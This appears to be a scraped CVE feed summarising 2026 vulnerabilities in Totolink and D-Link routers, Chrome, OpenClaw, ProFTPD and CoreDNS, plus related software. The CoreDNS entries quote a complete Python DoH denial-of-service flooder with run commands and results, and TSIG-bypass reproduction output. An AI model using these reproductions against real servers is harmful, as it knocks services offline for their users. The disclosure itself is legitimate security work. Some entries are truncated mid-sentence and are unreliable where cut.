Skip to main content
CVE-2026-7240 HIGH POC This Week

OS command injection in Totolink A8000RU firmware 7.1cu.643_b20200521 allows remote unauthenticated attackers to execute arbitrary system commands via the User parameter in the setVpnAccountCfg function of /cgi-bin/cstecgi.cgi. Publicly available exploit code exists (GitHub POC), enabling immediate weaponization. CVSS 8.9 with full impact on confidentiality, integrity, and availability. EPSS data unavailable; not currently in CISA KEV, but the combination of network accessibility, no authentication requirement, and public exploit makes this a critical risk for internet-facing devices.

Command Injection A8000Ru
NVD VulDB GitHub
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-42167 HIGH POC PATCH This Week

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

SQLi RCE Proftpd
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.2%
CVE-2026-7219 HIGH POC This Week

Buffer overflow in Totolink N300RT router firmware 3.4.0-B20250430 allows authenticated remote attackers with high-privilege administrative access to execute arbitrary code via crafted input to the entry_name parameter in /boafrm/formIpQoS. Public exploit code is available on GitHub demonstrating the vulnerability. EPSS data not provided, but the requirement for high-privilege authentication significantly limits real-world exploitation surface to scenarios where administrative credentials are already compromised.

Buffer Overflow N300Rt
NVD VulDB GitHub
CVSS 4.0
7.3
EPSS
0.1%
CVE-2026-7218 HIGH POC This Week

Buffer overflow in Totolink N300RT 3.4.0-B20250430 enables authenticated remote code execution via the WPS configuration handler. An attacker with administrative credentials (PR:H) can send a crafted localPin parameter to /boafrm/formWsc, overflowing a buffer in the is_cmd_string_valid function (libapmib.so) to execute arbitrary code with full system access (VC:H/VI:H/VA:H). Public proof-of-concept exploit code exists on GitHub (xiaohaiyang-ai/TOTOLINK-N300RT-Buffer-Overflow), increasing weaponization risk despite requiring privileged access. EPSS data not available; no CISA KEV listing indicates exploitation not yet widespread in wild attacks.

Buffer Overflow N300Rt
NVD VulDB GitHub
CVSS 4.0
7.3
EPSS
0.1%
CVE-2026-20766 HIGH CISA Act Now

Out-of-bounds memory access in Milesight AIOT camera firmware enables remote attackers to achieve high-severity impacts on confidentiality, integrity, and availability when users interact with malicious content. CISA ICS-CERT has issued an advisory for this industrial IoT vulnerability. With network attack vector (AV:N) and low complexity (AC:L) but requiring user interaction (UI:A), the vulnerability presents significant risk to operational technology environments where these cameras are deployed for industrial surveillance and monitoring applications.

Buffer Overflow Heap Overflow
NVD GitHub
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-27785 HIGH CISA Act Now

Hard-coded credentials in Milesight AIOT camera firmware allow adjacent network attackers to gain full system access without authentication. CISA ICS-CERT has published an advisory, indicating industrial/IoT deployment concern. The CVSS 7.7 score reflects adjacent network vector (AV:A) with low complexity (AC:L) and no authentication required (PR:N), enabling complete compromise of confidentiality, integrity, and availability on vulnerable devices. Firmware-level credential hardcoding (CWE-798) cannot be disabled through configuration changes, making patching critical for exposed industrial camera deployments.

Authentication Bypass
NVD GitHub VulDB
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-32649 HIGH CISA Act Now

Command injection in Milesight camera web servers allows authenticated administrators with user interaction to execute arbitrary operating system commands. CISA ICS-CERT issued an advisory (ICSA-26-113-03), indicating operational technology/critical infrastructure relevance. Successful exploitation achieves complete compromise of camera confidentiality and integrity. Attack requires privileged credentials (admin-level) and user interaction, significantly limiting real-world exploitation scenarios compared to unauthenticated remote attacks.

Command Injection
NVD GitHub
CVSS 4.0
7.3
EPSS
0.1%
CVE-2026-7244 HIGH This Week

Remote unauthenticated command injection in Totolink A8000RU 7.1cu.643_b20200521 allows complete device compromise via crafted requests to the WiFi Guest Configuration CGI handler. Attackers can inject arbitrary OS commands through the 'merge' parameter in setWiFiEasyGuestCfg function at /cgi-bin/cstecgi.cgi, achieving full system control without authentication. Public exploit code exists (confirmed by CVSS E:P and GitHub POC reference), significantly lowering the barrier to exploitation. EPSS data not available, but the combination of network attack vector, no authentication requirement, low complexity, and publicly available exploit indicates elevated real-world risk for internet-facing devices.

Command Injection
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-7243 HIGH This Week

Remote unauthenticated command injection in Totolink A8000RU 7.1cu.643_b20200521 allows attackers to execute arbitrary OS commands via the maxRtrAdvInterval parameter in the setRadvdCfg function of /cgi-bin/cstecgi.cgi. Public exploit code exists per VulDB submission, enabling immediate weaponization against exposed devices. CVSS 8.9 reflects network accessibility, no authentication requirement, and high impact across confidentiality, integrity, and availability - attack complexity is low with no user interaction needed, making this a critical priority for internet-facing Totolink routers.

Command Injection
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-7242 HIGH This Week

OS command injection in Totolink A8000RU router firmware 7.1cu.643_b20200521 allows unauthenticated remote attackers to execute arbitrary system commands via the setOpenVpnClientCfg function in /cgi-bin/cstecgi.cgi by manipulating the 'enabled' parameter. Public exploit code exists (disclosed on GitHub), significantly lowering the barrier to exploitation. CVSS 8.9 reflects the complete compromise potential (confidentiality, integrity, availability) without requiring authentication or user interaction, making this a critical exposure for deployed devices.

Command Injection
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-7241 HIGH This Week

Remote command injection in Totolink A8000RU firmware 7.1cu.643_b20200521 allows unauthenticated attackers to execute arbitrary OS commands via the wifiOff parameter in setWiFiBasicCfg function. The vulnerability has a publicly available exploit (PoC on GitHub) and achieves full system compromise with network-accessible attack vector requiring no authentication or user interaction. EPSS data not available, but CVSS 8.9 (Critical) with exploitability confirmed (E:P) indicates immediate patching priority for exposed devices.

Command Injection
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-7204 HIGH This Week

Remote command injection in Totolink A8000RU router firmware 7.1cu.643_b20200521 allows unauthenticated attackers to execute arbitrary OS commands via the 'enable' parameter in setPptpServerCfg function of /cgi-bin/cstecgi.cgi. Public exploit code exists (GitHub POC available), enabling trivial remote compromise without authentication or user interaction. CVSS v4.0 score of 8.9 reflects maximum impact on confidentiality, integrity, and availability. No EPSS data or CISA KEV status available, but publicly documented POC substantially lowers exploitation barrier for this home/small office router platform.

Command Injection
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-7203 HIGH This Week

Remote command injection in Totolink A8000RU router firmware 7.1cu.643_b20200521 allows unauthenticated attackers to execute arbitrary OS commands with router privileges via the setUrlFilterRules CGI function. Public exploit code exists (CVSS:4.0 E:P indicator), significantly increasing exploitation risk. EPSS data unavailable, but network-accessible command injection with public POC represents critical risk for internet-exposed devices.

Command Injection
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-7202 HIGH This Week

OS command injection in Totolink A8000RU router firmware version 7.1cu.643_b20200521 allows remote unauthenticated attackers to execute arbitrary system commands with root privileges via the wscDisabled parameter in the setWiFiWpsStart function of /cgi-bin/cstecgi.cgi. Public exploit code exists (VulDB #359802), enabling trivial weaponization. EPSS score unavailable; CVSS 8.9 reflects network-based unauthenticated attack with complete device compromise. No CISA KEV listing at time of analysis, suggesting targeted rather than mass exploitation.

Command Injection
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.9%
CVE-2026-7248 HIGH This Week

Remote code execution in D-Link DI-8100 router firmware 16.07.26A1 allows unauthenticated attackers to compromise the device via buffer overflow in the CGI endpoint. The vulnerability resides in the tgfile.htm CGI handler where inadequate input validation of the 'fn' parameter enables attackers to overflow a stack or heap buffer. Public exploit code is available on GitHub, significantly lowering the barrier to exploitation against internet-exposed devices. CVSS 8.9 (Critical) with network vector, low complexity, and no privileges required indicates high real-world risk for exposed D-Link DI-8100 routers.

Buffer Overflow D-Link
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.1%
CVE-2026-38949 HIGH This Week

Stored Cross-Site Scripting in HTMLy 3.1.1 allows authenticated users with content creation privileges to inject malicious JavaScript via the image upload endpoint (/add/content?type=image), executing arbitrary code in victim browsers with scope change (S:C) indicating potential account takeover or session hijacking. Public proof-of-concept exists (YouTube demonstration and GitHub writeup), though EPSS score remains low (2%, 4th percentile) and no active exploitation has been confirmed by CISA KEV. CVSS 8.9 reflects high confidentiality and integrity impact but requires victim interaction.

XSS RCE N A
NVD GitHub
CVSS 3.1
8.9
EPSS
0.0%
CVE-2026-24186 HIGH This Week

Remote code execution in NVIDIA FLARE SDK allows authenticated attackers to execute arbitrary code by sending maliciously crafted FOBS-encoded messages that exploit unsafe deserialization in the FOBS component. The vulnerability affects federated learning deployments where NVIDIA FLARE SDK processes messages from low-privileged authenticated users, enabling complete system compromise with high impact to confidentiality, integrity, and availability. No active exploitation confirmed (not in CISA KEV) and public exploit status unknown at time of analysis.

Nvidia Deserialization RCE
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41394 HIGH PATCH This Week

Authentication bypass in OpenClaw allows remote unauthenticated attackers to execute privileged runtime operations intended for authorized operators. The vulnerability exists in plugin-auth HTTP routes that incorrectly grant operator-level write scopes without authentication checks. Attackers can remotely exploit this flaw with low complexity (CVSS:4.0 AV:N/AC:L/PR:N) to modify runtime configurations and perform administrative actions. Vendor-released patch available as of commit 2a1db0c (March 31, 2026). No active exploitation confirmed in CISA KEV, though EPSS data unavailable for risk calibration.

Authentication Bypass Openclaw
NVD GitHub
CVSS 4.0
8.8
EPSS
0.1%
CVE-2026-40978 HIGH PATCH GHSA This Week

SQL injection in Spring AI's CosmosDBVectorStore component (versions 1.0.0-1.0.5 and 1.1.0-1.1.4) enables authenticated remote attackers to execute arbitrary SQL queries through malicious document IDs, potentially achieving full database compromise including data exfiltration, modification, and denial of service. VMware has released patches in versions 1.0.6 and 1.1.5. CVSS score of 8.8 reflects high impact across confidentiality, integrity, and availability, though exploitation requires low-privilege authenticated access to the vector store API.

Java SQLi
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7355 HIGH PATCH This Week

Use after free in Media in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7335 HIGH PATCH This Week

Use after free in media in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7356 HIGH PATCH This Week

Use after free in Navigation in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7342 HIGH PATCH This Week

Use after free in WebView in Google Chrome on Android prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7339 HIGH PATCH This Week

Heap buffer overflow in WebRTC in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

Buffer Overflow Google Heap Overflow Red Hat Suse +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7337 HIGH PATCH This Week

Type Confusion in V8 in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Google RCE Red Hat Suse +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7348 HIGH PATCH This Week

Use after free in Codecs in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7354 HIGH PATCH This Week

Out of bounds read and write in Angle in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Buffer Overflow Google Information Disclosure Red Hat Suse +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7334 HIGH PATCH This Week

Use after free in Views in Google Chrome on Mac prior to 147.0.7727.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google Denial Of Service Red Hat +2
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7358 HIGH PATCH This Week

Use after free in Animation in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7359 HIGH PATCH This Week

Use after free in ANGLE in Google Chrome prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google Denial Of Service Red Hat +2
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7344 HIGH PATCH This Week

Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

Use After Free Microsoft Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7361 HIGH PATCH This Week

Use after free in iOS in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

Use After Free Memory Corruption Apple Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7363 HIGH PATCH This Week

Use after free in Canvas in Google Chrome on Linux, ChromeOS prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Critical)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7341 HIGH PATCH This Week

Use after free in WebRTC in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7336 HIGH PATCH This Week

Use after free in WebRTC in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption Google Denial Of Service +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-41405 HIGH PATCH This Week

Resource exhaustion in OpenClaw before 2026.3.31 allows remote unauthenticated attackers to crash servers by sending malicious Microsoft Teams webhook payloads. The application parses request bodies before performing JWT validation, enabling attackers to bypass authentication and trigger denial-of-service conditions. A vendor patch is available via GitHub commit 3834d47, with no evidence of active exploitation (not in CISA KEV) and no public POC identified at time of analysis.

Denial Of Service Openclaw
NVD GitHub
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-32934 HIGH PATCH GHSA This Week

{ worker_pool_size ... }, CoreDNS still spawns a goroutine per accepted stream (workers + waiters) and active workers can block indefinitely in io.ReadFull() with no per-stream read deadline, enabling unauthenticated remote DoS via memory exhaustion/OOM-kill. CoreDNS' DoQ server uses a global worker pool (streamProcessPool) to limit concurrent stream processing, but when the pool is full it still spawns a goroutine per accepted stream that waits to acquire a worker token: select { case s.streamProcessPool <- ...: go ...; default: go ... wait for token ... } (core/dnsserver/server_quic.go) Additionally, the DoQ message framing reads are blocking io.ReadFull() calls with no per-stream read deadline: readDOQMessage() reads the 2-byte length prefix and message body via io.ReadFull() (core/dnsserver/server_quic.go) This allows an attacker to pin all workers by sending 1 byte (so io.ReadFull() blocks waiting for the second byte of the DoQ length prefix), while also creating an unbounded backlog of goroutines waiting for a worker token. Note: this appears to be a result of an incomplete fix/regression for CVE-2025-47950 (GHSA-cvx7-x8pj-x2gw). 1. Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well) 2. Run python3 ./doq-dos-repro.py 3. Expected sample output: *** Start CoreDNS *** Corefile: /tmp/vh-f003-doq-mem-regression/Corefile Log: /tmp/vh-f003-doq-mem-regression/coredns.log *** Baseline sample (idle) *** rss_kib=49380 go_goroutines=17 *** Build + run partial-stream flooder *** go: downloading golang.org/x/net v0.43.0 go: downloading golang.org/x/crypto v0.41.0 go: downloading go.uber.org/mock v0.5.2 go: downloading github.com/stretchr/testify v1.11.1 go: downloading golang.org/x/sys v0.35.0 go: downloading github.com/pmezard/go-difflib v1.0.0 go: downloading github.com/davecgh/go-spew v1.1.1 go: downloading gopkg.in/yaml.v3 v3.0.1 *** Candidate sample (during attack) *** rss_kib=137968 go_goroutines=15557 *** Flooder output *** opened conns=60 streams_per_conn=256 total_streams=15360 *** Wrote results *** /tmp/vh-f003-doq-mem-regression/results.json *** OK *** DoQ flood caused goroutine/RSS growth despite worker_pool_size. Unauthenticated remote DoS on an encrypted DNS transport via goroutine/RSS growth leading to OOM-kill/crash and service outage.

Suse Denial Of Service Red Hat
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-32936 HIGH PATCH GHSA This Week

{ values := req.URL.Query() b64, ok := values["dns"] if !ok { return nil, fmt.Errorf("no 'dns' query parameter found") } if len(b64) != 1 { return nil, fmt.Errorf("multiple 'dns' query values found") } return base64ToMsg(b64[0]) } func base64ToMsg(b64 string) (*dns.Msg, error) { buf, err := b64Enc.DecodeString(b64) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ```` By contrast, the POST path applies a bounded read before unpacking: ```go func toMsg(r io.ReadCloser) (*dns.Msg, error) { buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536)) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ``` So, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs. In addition, the HTTPS server is created in `core/dnsserver/server_https.go:87-92` without an explicit early GET-path size guard in this path: ```go srv := &http.Server{ ReadTimeout: s.ReadTimeout, WriteTimeout: s.WriteTimeout, IdleTimeout: s.IdleTimeout, ErrorLog: stdlog.New(&loggerAdapter{}, "", 0), } ``` As a result, oversized DoH GET request targets are processed through: 1. HTTP request-line parsing 2. URL query parsing / unescaping 3. DoH GET extraction 4. base64 decoding 5. DNS message unpacking before the request is rejected. The root cause is missing early size validation on the DoH GET path. More specifically: * `requestToMsgGet()` performs `req.URL.Query()` on attacker-controlled oversized request targets. * The extracted `dns` value is passed to `base64ToMsg()` without an encoded-length or decoded-length bound. * `base64ToMsg()` fully decodes the attacker-controlled string before any DNS-size rejection. * The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound. This creates a pre-validation resource-amplification path for DoH GET. This was reproduced locally against CoreDNS 1.14.2 over HTTPS with `pprof` enabled. Create a self-signed certificate: ```bash openssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \ -keyout key.pem -out cert.pem \ -subj "/CN=127.0.0.1" ``` Create this `Corefile`: ```txt https://127.0.0.1:8443 { whoami log errors tls cert.pem key.pem pprof 127.0.0.1:6060 } ``` Run CoreDNS: ```bash ./coredns -conf Corefile ``` ```python #!/usr/bin/env python3 import argparse import base64 import collections import concurrent.futures import http.client import ssl import time def send_one(host, port, path, timeout): ctx = ssl._create_unverified_context() conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx) try: conn.request("GET", path, headers={ "Accept": "application/dns-message", "Connection": "close", }) resp = conn.getresponse() resp.read() return resp.status except Exception as e: return f"ERR:{type(e).__name__}" finally: try: conn.close() except Exception: pass def main(): ap = argparse.ArgumentParser() ap.add_argument("--host", default="127.0.0.1") ap.add_argument("--port", type=int, default=8443) ap.add_argument("--decoded-kib", type=int, default=720) ap.add_argument("--workers", type=int, default=64) ap.add_argument("--requests", type=int, default=5000) ap.add_argument("--timeout", type=float, default=5.0) args = ap.parse_args() raw = b"A" * (args.decoded_kib * 1024) b64 = base64.urlsafe_b64encode(raw).rstrip(b"=").decode() path = "/dns-query?dns=" + b64 print(f"[+] target = https://{args.host}:{args.port}") print(f"[+] decoded bytes = {len(raw):,}") print(f"[+] encoded chars = {len(b64):,}") print(f"[+] request-target length = {len(path):,}") print(f"[+] workers = {args.workers}, requests = {args.requests}") print("[+] 400 responses are expected; the issue is expensive processing before rejection.\n") started = time.time() results = collections.Counter() with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex: futs = [ ex.submit(send_one, args.host, args.port, path, args.timeout) for _ in range(args.requests) ] for i, fut in enumerate(concurrent.futures.as_completed(futs), 1): results[fut.result()] += 1 if i % 10 == 0 or i == args.requests: print(f"[{i}/{args.requests}] {dict(results)}") elapsed = time.time() - started print("\n[+] done") print(f"[+] elapsed = {elapsed:.2f}s") print(f"[+] summary = {dict(results)}") if __name__ == "__main__": main() ``` Run the PoC: ```bash python3 poc_doh_get_oversize_https.py \ --host 127.0.0.1 \ --port 8443 \ --decoded-kib 720 \ --workers 64 \ --requests 5000 ``` CPU profile: ```bash (curl -s "http://127.0.0.1:6060/debug/pprof/profile?seconds=20" -o cpu_attack.pb.gz &) ; \ sleep 1 ; \ python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \ wait go tool pprof -top ./coredns cpu_attack.pb.gz ``` Heap / allocation profiles: ```bash curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz go tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz go tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz ``` The issue was confirmed using the following: * CoreDNS 1.14.2 * linux/amd64 * go1.26.1 PoC payload characteristics: * decoded payload size: `737,280 bytes` * base64url-encoded `dns` length: `983,040` * request-target length: `983,055` Observed request outcome: * `5000 / 5000` requests returned `400 Bad Request` * total runtime for the 5000-request run: `18.22s` The important point is that the requests are rejected only after expensive processing has already happened. The CPU profile captured during the attack showed significant time in: * `net/http.readRequest` * `net/url.ParseQuery` / `net/url.QueryUnescape` / `net/url.unescape` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` * `encoding/base64.(*Encoding).DecodeString` * Go GC worker paths Representative cumulative values from the captured profile included: * `github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP` → `10.91s` * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `3.50s` * `encoding/base64.(*Encoding).DecodeString` → `3.46s` * `net/http.readRequest` → `10.57s` * `net/url.(*URL).Query` / `ParseQuery` / `QueryUnescape` → `7.38s` * `runtime.gcBgMarkWorker` and related GC paths were also heavily active This demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection. Allocation profiling showed very large transient allocation volume caused by the rejected requests: * total `alloc_space`: `26,756.48 MB` Top contributors included: * `net/textproto.(*Reader).readLineSlice` → `19,668.19 MB` * `net/textproto.(*Reader).ReadLine` → `3,738.84 MB` * `encoding/base64.(*Encoding).DecodeString` → `2,766.16 MB` Within the CoreDNS DoH GET path specifically: * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `2,773.67 MB` Heap delta (`inuse_space`) also showed live growth attributable to this path, including: * `encoding/base64.(*Encoding).DecodeString` → `7,629.75 kB` Runtime memory monitoring showed a clear increase in peak resident usage during the attack: * baseline `VmHWM / VmRSS` before load was approximately `55,864 kB` * observed `VmHWM` during testing reached approximately `146,100 kB` So even though requests returned `400`, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work. Impact includes: * elevated CPU consumption * large transient allocations * increased garbage-collection pressure * higher peak resident memory usage * degraded throughput and responsiveness * denial of service risk on memory-constrained or heavily loaded deployments This is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication. The fact that the final HTTP status is `400 Bad Request` does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated. A robust fix should address both stages of the problem: 1. Apply an early bound on the DoH GET request target / raw query length before expensive query parsing. 2. Enforce an encoded-length and decoded-length limit for the `dns` parameter before calling `DecodeString()`. 3. Preserve equivalent size constraints across GET and POST paths. A minimal hardening direction would be: * reject oversized GET requests before `req.URL.Query()` on the DoH path * reject `dns` values whose encoded length exceeds the maximum valid DNS message encoding * reject any decoded payload larger than the supported DNS message size before unpacking

Suse OpenSSL Python Denial Of Service Red Hat
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-33190 HIGH PATCH GHSA This Week

{ ... NOTAUTH ... } (plugin/tsig/tsig.go) Two affected transports are shown directly in the PoC: - DoH: DoHWriter.TsigStatus() always returns nil (core/dnsserver/https.go), and the HTTP server passes unpacked DNS messages directly into the plugin chain. - DoT: the TLS server builds a dns.Server without setting TsigSecret (core/dnsserver/server_tls.go), unlike plain DNS/TCP/UDP which sets TsigSecret: s.tsigSecret (core/dnsserver/server.go). The same transport-family bug pattern also appears on other transports: - DoH3 reuses the DoH writer path (core/dnsserver/server_https3.go -> core/dnsserver/https.go), so it inherits the same TsigStatus() == nil behavior. - DoQ uses DoQWriter.TsigStatus() error { return nil } (core/dnsserver/quic.go). - gRPC uses gRPCresponse.TsigStatus() error { return nil } (core/dnsserver/server_grpc.go). The attached PoC was kept deliberately small (baseline TCP+DoT+DoH only) for convenience. 1. Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well) 2. Run python3 ./tsig-repro.py 3. Expected output: *** Start CoreDNS *** Corefile: /tmp/vh-f001-tsig-doh-dot-bypass/Corefile Log: /tmp/vh-f001-tsig-doh-dot-bypass/coredns.log *** Baseline (plain TCP) *** no_tsig rcode=5 (expected REFUSED=5) invalid_tsig rcode=9 (expected NOTAUTH=9) *** Candidate (DoT) *** no_tsig rcode=5 (expected REFUSED=5) invalid_tsig rcode=0 ancount=1 (expected NOERROR=0 and ancount>0) *** Candidate (DoH) *** no_tsig http=200 rcode=5 (expected REFUSED=5) invalid_tsig http=200 rcode=0 ancount=1 (expected NOERROR=0 and ancount>0) *** OK *** TSIG bypass reproduced: plain TCP rejects invalid TSIG, while DoT and DoH accept it. Results: /tmp/vh-f001-tsig-doh-dot-bypass/results.json Unauthenticated remote clients can bypass TSIG-based authentication/authorization on first-class encrypted transports, enabling access to whatever the deployment intended to restrict behind tsig { require all } (e.g., zone data/privileged queries, etc.).

Authentication Bypass Red Hat
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-41399 HIGH PATCH This Week

Denial of service in OpenClaw (pre-2026.3.28) allows remote unauthenticated attackers to exhaust server resources by flooding the application with concurrent WebSocket upgrade requests. The vulnerability stems from lack of rate-limiting and resource budgeting before authentication, enabling attackers to monopolize socket and worker thread capacity and block legitimate WebSocket clients. No active exploitation confirmed (not in CISA KEV), but the technical barrier is low given unauthenticated network access (CVSS:4.0 AV:N/AC:L/PR:N). VulnCheck reported this vulnerability with vendor advisory available on GitHub.

Denial Of Service Openclaw
NVD GitHub
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-41636 HIGH PATCH GHSA This Week

Uncontrolled recursion in Apache Thrift Node.js library's skip() function enables remote denial of service via crafted protocol messages. Attacker sends specially-crafted Thrift messages triggering deep recursion in the skip() deserialization routine, exhausting stack memory and crashing the Node.js process. CVSS 8.7 High severity with network attack vector requiring no authentication. Disclosed via oss-security mailing list on 2026-04-28 alongside three related Thrift vulnerabilities (C++ JSON OOB read CVE-2026-41607, c_glib dispatch stack overflow CVE-2026-41606, Swift Compact Protocol issue CVE-2026-41605), suggesting coordinated security audit results. EPSS data not yet available for 2026 CVE.

Node.js Buffer Overflow Apache Red Hat Suse
NVD
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-42426 HIGH PATCH This Week

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attackers with operator.write permissions can bypass pairing approval restrictions to gain unauthorized access to exec-capable nodes.

Authentication Bypass Openclaw
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2024-54013 HIGH PATCH This Week

Penetration Testing engineers at Amazon have identified a security flaw related to request handling in the web server component that could, under certain conditions, lead to unintended access to. Rated high severity (CVSS 8.7), this vulnerability is no authentication required, low attack complexity. This Missing Authentication for Critical Function vulnerability could allow attackers to access critical functionality without authentication.

Authentication Bypass Qnd 8080R
NVD VulDB
